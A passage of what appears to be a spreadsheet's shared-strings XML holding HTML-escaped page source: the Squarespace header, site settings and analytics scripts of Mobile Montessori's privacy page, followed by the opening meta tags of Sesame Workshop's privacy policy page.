&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/user-account-core-b732b38a80f113148ce74-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].css = ["//assets.squarespace.com/universal/styles-compressed/user-account-core-68c2f27a2a82c80680342-min.en-US.css"]; })(SQUARESPACE_ROLLUPS, 'squarespace-user_account_core');&lt;/script&gt;
&lt;link rel="stylesheet" type="text/css" href="//assets.squarespace.com/universal/styles-compressed/user-account-core-68c2f27a2a82c80680342-min.en-US.css"&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-performance');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js" defer &gt;&lt;/script&gt;&lt;script data-name="static-context"&gt;Static = window.</t>
  </si>
  <si>
    <t>Static || {}; Static.SQUARESPACE_CONTEXT = {"facebookAppId":"314192535267336","facebookApiVersion":"v6.0","rollups":{"squarespace-announcement-bar":{"js":"//assets.squarespace.com/universal/scripts-compressed/announcement-bar-cfb9ca391e5434cccb495-min.en-US.js"},"squarespace-audio-player":{"css":"//assets.squarespace.com/universal/styles-compressed/audio-player-702bf18174efe0acaa8ce-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/audio-player-d61ee22e7c56cbfe6bf6f-min.en-US.js"},"squarespace-blog-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/blog-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/blog-collection-list-44ab3d6f12cddbd366f28-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//assets.squarespace.com/universal/styles-compressed/calendar-block-renderer-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/calendar-block-renderer-6f20ca9fe0574949433f3-min.en-US.js"},"squarespace-chartjs-helpers":{"css":"//assets.squarespace.com/universal/styles-compressed/chartjs-helpers-53c004ac7d4bde1c92e38-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/chartjs-helpers-aff2d23104600df085fdd-min.en-US.js"},"squarespace-comments":{"css":"//assets.squarespace.com/universal/styles-compressed/comments-cb7553e34a4da425817c4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/comments-8a4bd0618556454361bcc-min.en-US.js"},"squarespace-dialog":{"css":"//assets.squarespace.com/universal/styles-compressed/dialog-89b254b5c87045b9e1360-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/dialog-a03ec6aa3252c6c79a13c-min.en-US.js"},"squarespace-events-collection":{"css":"//assets.squarespace.com/universal/styles-compressed/events-collection-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/events-collection-9c7837f8e8c7ba99a4aa2-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//assets.squarespace.com/universal/scripts-compressed/form-rendering-utils-3a18a40d3a28179a79fe4-min.en-US.js"},"squarespace-forms":{"css":"//assets.squarespace.com/universal/styles-compressed/forms-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/forms-97452adf98b259487f44f-min.en-US.js"},"squarespace-gallery-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/gallery-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/gallery-collection-list-ccf378030ccbdb6e9f20a-min.en-US.js"},"squarespace-image-zoom":{"css":"//assets.squarespace.com/universal/styles-compressed/image-zoom-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/image-zoom-95bf63ca6dc7a85183665-min.en-US.js"},"squarespace-pinterest":{"css":"//assets.squarespace.com/universal/styles-compressed/pinterest-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/pinterest-a4e9fe29fb0c5c424e870-min.en-US.js"},"squarespace-popup-overlay":{"css":"//assets.squarespace.com/universal/styles-compressed/popup-overlay-948192219c3257f767ec5-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/popup-overlay-da01f0f5ae33a3ed4a094-min.en-US.js"},"squarespace-product-quick-view":{"css":"//assets.squarespace.com/universal/styles-compressed/product-quick-view-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/product-quick-view-f8880f39f29bf227cca9f-min.en-US.js"},"squarespace-products-collection-item-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-item-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-item-v2-4d72177710b16966fd304-min.en-US.js"},"squarespace-products-collection-list-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-list-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-list-v2-86cb9526983c4269307f0-min.en-US.js"},"squarespace-search-page":{"css":"//assets.squarespace.com/universal/styles-compressed/search-page-9d0a55de1efafbb9218e1-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/search-page-af841a4de517d1960ffe3-min.en-US.js"},"squarespace-search-preview":{"js":"//assets.squarespace.com/universal/scripts-compressed/search-preview-8c25e422640fd7271eda1-min.en-US.js"},"squarespace-simple-liking":{"css":"//assets.squarespace.com/universal/styles-compressed/simple-liking-ef94529873378652e6e86-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/simple-liking-eec025f782ea0a61910bd-min.en-US.js"},"squarespace-social-buttons":{"css":"//assets.squarespace.com/universal/styles-compressed/social-buttons-1f18e025ea682ade6293a-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/social-buttons-a2f5c0c402abbb48429cb-min.en-US.js"},"squarespace-tourdates":{"css":"//assets.squarespace.com/universal/styles-compressed/tourdates-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/tourdates-a1067e56130bfa7beb364-min.en-US.js"},"squarespace-website-overlays-manager":{"css":"//assets.squarespace.com/universal/styles-compressed/website-overlays-manager-7cecc648f858e6f692130-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/website-overlays-manager-7bf44765a935060ae0761-min.en-US.js"}},"pageType":2,"website":{"id":"533c6f0ae4b0907609ac6309","identifier":"mobilemontessori","websiteType":1,"contentModifiedOn":1681185982007,"cloneable":false,"hasBeenCloneable":false,"siteStatus":{},"language":"en-US","timeZone":"America/New_York","machineTimeZoneOffset":-14400000,"timeZoneOffset":-14400000,"timeZoneAbbr":"EDT","siteTitle":"Mobile Montessori","fullSiteTitle":"privacy \u2014 Mobile Montessori","siteTagLine":"Creators of Montessori inspired, educational apps for Apple devices","siteDescription":"&lt;p&gt;We create quality educational apps for Apple devices.&amp;nbsp;&lt;/p&gt;","location":{"mapZoom":4.0,"mapLat":28.98235510342607,"mapLng":-71.35202625361329,"addressLine1":"","addressLine2":"","addressCountry":""},"logoImageId":"63ebb208d68c7d5290af7453","shareButtonOptions":{"1":true,"3":true,"6":true,"7":true,"8":true,"2":true,"4":true},"logoImageUrl":"//images.squarespace-cdn.com/content/v1/533c6f0ae4b0907609ac6309/7886dc9f-1be1-487f-bdf4-621360cc3d40/MMLogoTitle1.png","authenticUrl":"https://www.mobilemontessori.org","internalUrl":"https://mobilemontessori.squarespace.com","baseUrl":"https://www.mobilemontessori.org","primaryDomain":"www.mobilemontessori.org","sslSetting":3,"isHstsEnabled":false,"socialAccounts":[{"serviceId":20,"userId":"info@mobilemontessori.org","screenname":"info@mobilemontessori.org","addedOn":1396906250391,"profileUrl":"mailto: info@mobilemontessori.org","iconEnabled":true,"serviceName":"email"},{"serviceId":27,"userName":"iTunes Store","screenname":"iTunes</t>
  </si>
  <si>
    <t>Store","addedOn":1424107349148,"profileUrl":"https://itunes.apple.com/us/artist/rantek-inc./id319592818","iconEnabled":true,"serviceName":"itunes"},{"serviceId":28,"userName":"Google Play","screenname":"Google Play","addedOn":1559572743990,"profileUrl":"https://play.google.com/store/apps/dev?id=9193380164972758914","iconEnabled":true,"serviceName":"googleplay"},{"serviceId":74,"screenname":"URL","addedOn":1559572781920,"profileUrl":"https://www.amazon.com/s/ref=bl_dp_s_web_0?ie=UTF8&amp;search-alias=aps&amp;field-brandtextbin=Mobile+Montessori++by+Rantek+Inc.&amp;node=2350149011","iconEnabled":true,"serviceName":"url"},{"serviceId":61,"screenname":"Pinterest","addedOn":1617209286837,"profileUrl":"https://www.pinterest.com/mbmontessori/_created/","iconEnabled":true,"serviceName":"pinterest-unauth"}],"typekitId":"","statsMigrated":false,"imageMetadataProcessingEnabled":true,"screenshotId":"63cd970e0b406b8af13d951fe202e1364d63ae2913cb295d0eb2a1ed08754cbd","captchaSettings":{"siteKey":"6LfDOTUcAAAAANcOsX6C_-qNVBTVcOCn_8a4tB4B","enabledForDonations":false},"showOwnerLogin":false},"websiteSettings":{"id":"533c6f0ae4b0907609ac630a","websiteId":"533c6f0ae4b0907609ac6309","type":"Business","subjects":[{"systemSubject":"other","otherSubject":"Education"}],"country":"CR","simpleLikingEnabled":true,"mobileInfoBarSettings":{"style":1,"isContactEmailEnabled":false,"isContactPhoneNumberEnabled":false,"isLocationEnabled":false,"isBusinessHoursEnabled":false},"announcementBarSettings":{"style":1,"text":"&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;&lt;strong&gt;1 Week SALE - SAVE 50% on printables using the code SAVE50&lt;/strong&gt;&lt;/p&gt;","clickthroughUrl":{"url":"/mobilemontessorishop","newWindow":true}},"popupOverlaySettings":{"style":2,"showOnScroll":false,"scrollPercentage":25,"showOnTimer":true,"timerDelay":5000,"showUntilSignup":true,"displayFrequency":1,"enableMobile":true,"enabledPages":[],"showOnAllPages":true,"version":1},"commentLikesAllowed":true,"commentAnonAllowed":true,"commentThreaded":true,"commentApprovalRequired":false,"commentAvatarsOn":true,"commentSortType":2,"commentFlagThreshold":0,"commentFlagsAllowed":false,"commentEnableByDefault":true,"commentDisableAfterDaysDefault":0,"disqusShortname":"mobilemontessori","commentsEnabled":true,"contactPhoneNumber":"","businessHours":{"monday":{"text":"","ranges":[{}]},"tuesday":{"text":"","ranges":[{}]},"wednesday":{"text":"","ranges":[{}]},"thursday":{"text":"","ranges":[{}]},"friday":{"text":"","ranges":[{}]},"saturday":{"text":"","ranges":[{}]},"sunday":{"text":"","ranges":[{}]}},"storeSettings":{"returnPolicy":"","termsOfService":"&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;\u2022 All rights reserved. This file is for PERSONAL USE ONLY and is not to be resold or used for personal profit/benefit.&lt;/p&gt;&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;\u2022 No part of this file may be reproduced, edited, or transmitted in any form by any means, including photocopying or the use of other electronic/mechanical methods, without the prior written permission of Montessori Factory.&lt;/p&gt;&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;\u2022 Due to the nature of the product, no refunds or exchanges permitted for digital items.&lt;/p&gt;&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;\u2022 Colors may vary depending on your screen.&lt;/p&gt;&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;\u2022 Please note that this is a digital download.&lt;/p&gt;&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;\u2022 You will not receive a physical product.&lt;/p&gt;&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;\u2022 Download is intended for ONE USER ONLY, and transfer to a third party is strictly prohibited.&lt;/p&gt;&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;\u2022 File cannot be downloaded to multiple users on a shared account.&lt;/p&gt;","privacyPolicy":"","expressCheckout":false,"continueShoppingLinkUrl":"/","useLightCart":false,"showNoteField":false,"shippingCountryDefaultValue":"US","billToShippingDefaultValue":false,"showShippingPhoneNumber":false,"isShippingPhoneRequired":false,"showBillingPhoneNumber":false,"isBillingPhoneRequired":false,"currenciesSupported":["USD","ARS","AUD","BRL","CAD","CHF","COP","CZK","DKK","EUR","GBP","HKD","IDR","ILS","INR","JPY","MXN","MYR","NOK","NZD","PHP","PLN","RUB","SEK","SGD","THB","ZAR"],"defaultCurrency":"USD","selectedCurrency":"USD","measurementStandard":1,"showCustomCheckoutForm":false,"checkoutPageMarketingOptInEnabled":true,"enableMailingListOptInByDefault":true,"sameAsRetailLocation":false,"merchandisingSettings":{"scarcityEnabledOnProductItems":false,"scarcityEnabledOnProductBlocks":false,"scarcityMessageType":"DEFAULT_SCARCITY_MESSAGE","scarcityThreshold":10,"multipleQuantityAllowedForServices":true,"restockNotificationsEnabled":false,"restockNotificationsMailingListSignUpEnabled":false,"relatedProductsEnabled":false,"relatedProductsOrdering":"random","soldOutVariantsDropdownDisabled":false,"productComposerOptedIn":false,"productComposerABTestOptedOut":false,"productReviewsEnabled":false,"displayImportedProductReviewsEnabled":false,"hasOptedToCollectNativeReviews":false},"isLive":true,"multipleQuantityAllowedForServices":true},"useEscapeKeyToLogin":true,"ssBadgeType":1,"ssBadgePosition":4,"ssBadgeVisibility":1,"ssBadgeDevices":1,"pinterestOverlayOptions":{"mode":"enabled_for_blogs","size":"small","shape":"rect","color":"white"},"ampEnabled":true},"cookieSettings":{"isCookieBannerEnabled":false,"isRestrictiveCookiePolicyEnabled":false,"isRestrictiveCookiePolicyAbsolute":false,"cookieBannerText":"","cookieBannerTheme":"","cookieBannerVariant":"","cookieBannerPosition":"","cookieBannerCtaVariant":"","cookieBannerCtaText":"","cookieBannerAcceptType":"OPT_IN","cookieBannerOptOutCtaText":""},"websiteCloneable":false,"collection":{"title":"privacy","id":"53e3dd02e4b0302e54cdf0ab","fullUrl":"/privacy","type":10,"permissionType":1},"subscribed":false,"appDomain":"squarespace.com","templateTweakable":true,"tweakJSON":{"aspect-ratio":"Auto","design":"Slideshow","gallery-arrow-style":"No Background","gallery-aspect-ratio":"3:2 Standard","gallery-auto-crop":"true","gallery-autoplay":"false","gallery-controls":"Arrows","gallery-design":"Grid","gallery-info-overlay":"Show on Hover","gallery-loop":"false","gallery-navigation":"Bullets","gallery-show-arrows":"true","gallery-transitions":"Fade","galleryArrowBackground":"rgba(34,34,34,1)","galleryArrowColor":"rgba(255,255,255,1)","galleryAutoplaySpeed":"3","galleryCircleColor":"rgba(255,255,255,1)","galleryInfoBackground":"rgba(0, 0, 0, .7)","galleryThumbnailSize":"100px","grid-aspect-ratio":"1:1 (Square)","gridSize":"350px","gridSpacing":"20px","headerPadding":"18px","homepage-index-nav":"Show On Scroll","logoWidth":"300px","product-gallery-auto-crop":"false","product-image-auto-crop":"false","siteTitleContainerWidth":"255px","slideshow-aspect-ratio":"16:9 (Widescreen)","slideshow-autoplay":"true","slideshow-transition":"Fade","tweak-v1-related-products-title-spacing":"50px"},"templateId":"52e96934e4b0ea14d0f64568","templateVersion":"7","pageFeatures":[1,2,4],"gmRenderKey":"QUl6YVN5Q0JUUk9xNkx1dkZfSUUxcjQ2LVQ0QWVUU1YtMGQ3bXk4","templateScriptsRootUrl":"https://static1.squarespace.com/static/ta/52e968b5e4b04d2aa2a3bba3/1128/scripts/","betaFeatureFlags":["campaigns_asset_picker","multilingual_transactional_emails","commerce_clearpay","fluid_engine_clean_up_grid_contextual_change","block_annotations_revamp","scripts_defer","customer_account_creation_recaptcha","commerce_site_visitor_metrics","nested_categories_migration_enabled","viewer-role-contributor-invites","member_areas_feature","campaigns_show_featured_templates","background_art_onboarding","member_areas_provisioning_service","commerce_restock_notifications","commerce_order_status_access","campaigns_new_image_layout_picker","crm_enable_recaptcha_v3_enterprise","crm_default_newsletter_block_to_campaigns","commerce_etsy_product_import","campaigns_import_discounts","is_feature_gate_refresh_enabled","crm_retention_segment","customer_accounts_email_verification","crm_enforce_recaptcha_v3_enterprise","campaigns_thumbnail_layout","site_user_email_change","campaigns_discount_section_in_blasts","accounting_orders_sync","campaigns_discount_section_in_automations","crm_remove_subscriber","fluid_engine","campaigns_new_subscriber_search","member_areas_spanish_interviews","marketing_landing_page","crm_waitlist_enforce_recaptcha_v3_enterprise","member_areas_schedule_interview","campaigns_global_uc_ab","campaigns_content_editing_survey","commerce_etsy_shipping_import","send_local_pickup_ready_email","order_status_page_checkout_landing_enabled"],"videoAssetsFeatureFlags":["mux-data-video-collection","mux-data-course-collection","mux-data-video-block-autoplay"],"impersonatedSession":false,"tzData":{"zones":[[-300,"US","E%sT",null]],"rules":{"US":[[1967,2006,null,"Oct","lastSun","2:00","0","S"],[1987,2006,null,"Apr","Sun&gt;=1","2:00","1:00","D"],[2007,"max",null,"Mar","Sun&gt;=8","2:00","1:00","D"],[2007,"max",null,"Nov","Sun&gt;=1","2:00","0","S"]]}},"showAnnouncementBar":false,"recaptchaEnterpriseContext":{"recaptchaEnterpriseSiteKey":"6LdDFQwjAAAAAPigEvvPgEVbb7QBm-TkVJdDTlAv"},"i18nContext":{"timeZoneData":{"id":"America/New_York","name":"Eastern Time"}}};&lt;/script&gt;&lt;script&gt;SquarespaceFonts.loadViaContext(); Squarespace.load(window);&lt;/script&gt;
&lt;script type="application/ld+json"&gt;{"url":"https://www.mobilemontessori.org","name":"Mobile Montessori","description":"&lt;p&gt;</t>
  </si>
  <si>
    <t>We create quality educational apps for Apple devices.&amp;nbsp;&lt;/p&gt;","image":"//images.squarespace-cdn.com/content/v1/533c6f0ae4b0907609ac6309/7886dc9f-1be1-487f-bdf4-621360cc3d40/MMLogoTitle1.png","@context":"http://schema.org","@type":"WebSite"}&lt;/script&gt;&lt;script type="application/ld+json"&gt;{"address":"","image":"https://static1.squarespace.com/static/533c6f0ae4b0907609ac6309/t/63ebb208d68c7d5290af7453/1681185982007/","openingHours":", , , , , , ","@context":"http://schema.org","@type":"LocalBusiness"}&lt;/script&gt;&lt;link rel="stylesheet" type="text/css" href="https://static1.squarespace.com/static/sitecss/533c6f0ae4b0907609ac6309/339/52e96934e4b0ea14d0f64568/56fb3c1d2fe131fa488d1c9b/1128/site.css"/&gt;&lt;meta name="google-site-verification" content="b2reLH-HAOufOUW4YV61RuP7QzDQ1PC3n0-bC4w_XPo" /&gt;
&lt;meta name="msvalidate.01" content="8DAC45BA3CA1C9662FED7BD92F4E63C8" /&gt;
&lt;script&gt;
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-50064852-1', 'squarespace.com');
  ga('send', 'pageview');
&lt;/script&gt;
&lt;link href="https://plus.google.com/116704835823276628188" rel="publisher" /&gt;
&lt;script type="text/javascript"&gt;
  (function() {
    var po = document.createElement("script"); po.type = "text/javascript"; po.async = true;
    po.src = "https://apis.google.com/js/plusone.js?publisherid=116704835823276628188";
     var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(po, s);
  })();
&lt;/script&gt;&lt;script&gt;Static. COOKIE_BANNER_CAPABLE = true;&lt;/script&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-50064852-1"&gt;&lt;/script&gt;&lt;script&gt;window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t xml:space="preserve">[];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());gtag('set', 'developer_id.dZjQwMz', true);gtag('config', 'UA-50064852-1');&lt;/script&gt;&lt;!-- End of Squarespace Headers --&gt;
    &lt;script&gt;/* Must be below squarespace-headers */(function(){var touchTest="ontouchstart"in window||navigator.msMaxTouchPoints;if(!touchTest){with(document.documentElement){className=className.replace(new RegExp("touch-styles"),"")}}})()&lt;/script&gt;
  &lt;/head&gt;
  &lt;body id="collection-53e3dd02e4b0302e54cdf0ab" class="expand-homepage-index-links homepage-index-nav-show-on-scroll  index-section-separation-border design-slideshow grid-aspect-ratio-11-square grid-max-columns-four slideshow-aspect-ratio-169-widescreen slideshow-transition-fade slideshow-autoplay gallery-controls-arrows gallery-controls-color-light  meta-priority-date hide-entry-author  pre-footer-content-empty   show-category-navigation hide-album-share-link   event-thumbnails event-thumbnail-size-32-standard event-date-label event-date-label-time event-list-show-cats event-list-date event-list-time event-list-address   event-icalgcal-links  event-excerpts  event-item-back-link    gallery-design-grid aspect-ratio-auto lightbox-style-dark gallery-navigation-bullets gallery-info-overlay-show-on-hover gallery-aspect-ratio-32-standard gallery-arrow-style-no-background gallery-transitions-fade gallery-show-arrows gallery-auto-crop   product-list-titles-under product-list-alignment-center product-item-size-11-square  product-gallery-size-11-square  show-product-price show-product-item-nav  tweak-v1-related-products-image-aspect-ratio-11-square tweak-v1-related-products-details-alignment-center newsletter-style-light hide-opentable-icons opentable-style-dark small-button-style-raised small-button-shape-rounded medium-button-style-solid medium-button-shape-square large-button-style-raised large-button-shape-square image-block-poster-text-alignment-center image-block-card-dynamic-font-sizing image-block-card-content-position-center image-block-card-text-alignment-left image-block-overlap-dynamic-font-sizing image-block-overlap-content-position-center image-block-overlap-text-alignment-left image-block-collage-dynamic-font-sizing image-block-collage-content-position-top image-block-collage-text-alignment-left image-block-stack-dynamic-font-sizing image-block-stack-text-alignment-left button-style-raised button-corner-style-rounded tweak-product-quick-view-button-style-floating tweak-product-quick-view-button-position-bottom tweak-product-quick-view-lightbox-excerpt-display-truncate tweak-product-quick-view-lightbox-show-arrows tweak-product-quick-view-lightbox-show-close-button tweak-product-quick-view-lightbox-controls-weight-light native-currency-code-usd collection-type-page collection-53e3dd02e4b0302e54cdf0ab collection-layout-default mobile-style-available logo-image collection-privacy"&gt;
    &lt;div id="site"&gt;
      &lt;input type="checkbox" name="mobile-nav-toggle" id="mobileNavToggle" class="mobile-nav-toggle-box hidden" /&gt;
      &lt;div id="overlayNav"&gt;
  &lt;div id="mobileNavWrapper" class="nav-wrapper"&gt;
    &lt;nav id="mobileNavigation"&gt;
          &lt;div class="external"&gt;
            &lt;a href="https://www.mobilemontessori.org/mobile-montessori-apps/#MOREAPPS"&gt;
              Catalog
            &lt;/a&gt;
          &lt;/div&gt;
          &lt;div class="external"&gt;
            &lt;a href="/printables"&gt;
              Printables
            &lt;/a&gt;
          &lt;/div&gt;
          &lt;div class="external"&gt;
            &lt;a href="https://www.mobilemontessori.org/mobile-montessori-apps/#Method"&gt;
              Method
            &lt;/a&gt;
           &lt;/div&gt;
          &lt;div class="external"&gt;
            &lt;a href="/blog"&gt;
              BLOG
            &lt;/a&gt;
          </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;
          &lt;div class="external"&gt;
            &lt;a href="/about"&gt;
              About Us
            &lt;/a&gt;
          &lt;/div&gt;
        &lt;div class="user-account-link"&gt;
          &lt;a href="#"&gt;
            &lt;span class="unauth"&gt;Sign In&lt;/span&gt;
            &lt;span class="auth"&gt;My Account&lt;/span&gt;
          &lt;/a&gt;
        &lt;/div&gt;
    &lt;/nav&gt;
  &lt;/div&gt;
      &lt;/div&gt;
      &lt;header id="header" role="banner"&gt;
        &lt;div class="header-inner"&gt;
          &lt;div id="logoWrapper" class="title-logo-wrapper" data-content-field="site-title"&gt;
              &lt;h1 id="logoImage" class="tmpl-loading logo-image"&gt;&lt;a href="/"&gt;&lt;img src="//images.squarespace-cdn.com/content/v1/533c6f0ae4b0907609ac6309/7886dc9f-1be1-487f-bdf4-621360cc3d40/MMLogoTitle1.png?format=1500w" alt="Mobile Montessori" /&gt;&lt;/a&gt;&lt;/h1&gt;
           &lt;/div&gt;&lt;!-- comment the linebreak between these two elements because science
          --&gt;&lt;label for="mobileNavToggle" class="mobile-nav-toggle-label show-on-scroll-mobile"&gt;&lt;div class="top-bar"&gt;&lt;/div&gt;&lt;div class="middle-bar"&gt;&lt;/div&gt;&lt;div class="bottom-bar"&gt;&lt;/div&gt;&lt;/label&gt;&lt;!-- comment the linebreak between these two elements because science
          --&gt;&lt;div id="headerNav" class="tmpl-loading" &gt;
  &lt;div id="mainNavWrapper" class="nav-wrapper desktop-nav-wrapper show-on-scroll"&gt;
    &lt;nav id="mainNavigation" data-content-field="navigation" &gt;
          &lt;div class="external"&gt;
            &lt;a href="https://www.mobilemontessori.org/mobile-montessori-apps/#MOREAPPS"&gt;
              Catalog
            &lt;/a&gt;
          &lt;/div&gt;
          &lt;div class="external"&gt;
            &lt;a href="/printables"&gt;
              Printables
            &lt;/a&gt;
          &lt;/div&gt;
          &lt;div class="external"&gt;
            &lt;a href="https://www.mobilemontessori.org/mobile-montessori-apps/#Method"&gt;
              Method
            &lt;/a&gt;
           &lt;/div&gt;
          &lt;div class="external"&gt;
            &lt;a href="/blog"&gt;
              BLOG
            &lt;/a&gt;
          </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;
          &lt;div class="external"&gt;
            &lt;a href="/about"&gt;
              About Us
            &lt;/a&gt;
          &lt;/div&gt;
        &lt;div class="user-account-link"&gt;
      </t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;!doctype html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8" /&gt;
	&lt;meta name="description" content="Helping Kids Everywhere Grow Smarter, Stronger, and Kinder." /&gt;
	&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1" /&gt;
	&lt;link rel="preload" as="font" href="https://sesameworkshop.org/wp-content/themes/sesame-workshop/fonts/vag-rounded-next-regular.woff" /&gt;
	&lt;link rel="preload" as="font" href="https://sesameworkshop.org/wp-content/themes/sesame-workshop/fonts/vag-rounded-next-medium.woff" /&gt;
	&lt;link rel="preload" as="font" href="https://sesameworkshop.org/wp-content/themes/sesame-workshop/fonts/vag-rounded-next-bold.woff" /&gt;
	&lt;script src="https://cmp.osano.com/AzZN1gTM8kX2P2Kih/1a6e9463-975c-4647-bdac-481aa5a9313f/osano.js"&gt;&lt;/script&gt;
	&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
	new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
	j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
	'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
	})(window,document,'script','dataLayer','GTM-K9G2KZD');&lt;/script&gt;
	&lt;link rel="apple-touch-icon" sizes="180x180" href="https://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/apple-touch-icon.png"&gt;
	&lt;link rel="icon" type="image/png" sizes="32x32" href="https://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/favicon-32x32.png"&gt;
	&lt;link rel="icon" type="image/png" sizes="16x16" href="https://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/favicon-16x16.png"&gt;
	&lt;link rel="manifest" href="https://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/site.webmanifest"&gt;
	&lt;link rel="mask-icon" href="https://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/safari-pinned-tab.svg" color="#00953b"&gt;
	&lt;link rel="shortcut icon" href="https://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/favicon.ico"&gt;
	&lt;meta name="msapplication-TileColor" content="#00a300"&gt;
	&lt;meta name="msapplication-config" content="https://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/browserconfig.xsml"&gt;
	&lt;meta name="theme-color" content="#ffffff"&gt;	
	&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
	&lt;title&gt;Privacy Policy - Sesame Workshop&lt;/title&gt;
	&lt;meta name="description" content="Sesame Workshop has been trusted by parents for decades to provide safe, entertaining, and educational content.</t>
  </si>
  <si>
    <t>We take this trust seriously and recognize" /&gt;
	&lt;link rel="canonical" href="https://sesameworkshop.org/about-us/legal/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy - Sesame Workshop" /&gt;
	&lt;meta property="og:description" content="Sesame Workshop has been trusted by parents for decades to provide safe, entertaining, and educational content. We take this trust seriously and recognize" /&gt;
	&lt;meta property="og:url" content="https://sesameworkshop.org/about-us/legal/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Sesame Workshop" /&gt;
	&lt;meta property="article:publisher" content="https://www.facebook.com/SesameWorkshop/" /&gt;
	&lt;meta property="article:published_time" content="2022-12-13T21:49:32+00:00" /&gt;
	&lt;meta property="article:modified_time" content="2023-03-30T16:21:42+00:00" /&gt;
	&lt;meta property="og:image" content="https://sesameworkshop.org/wp-content/uploads/2023/03/Social_Image3-1040x780.png" /&gt;
	&lt;meta property="og:image:width" content="1040" /&gt;
	&lt;meta property="og:image:height" content="780" /&gt;
	&lt;meta property="og:image:type" content="image/png" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:site" content="@sesameworkshop" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="25 minutes" /&gt;
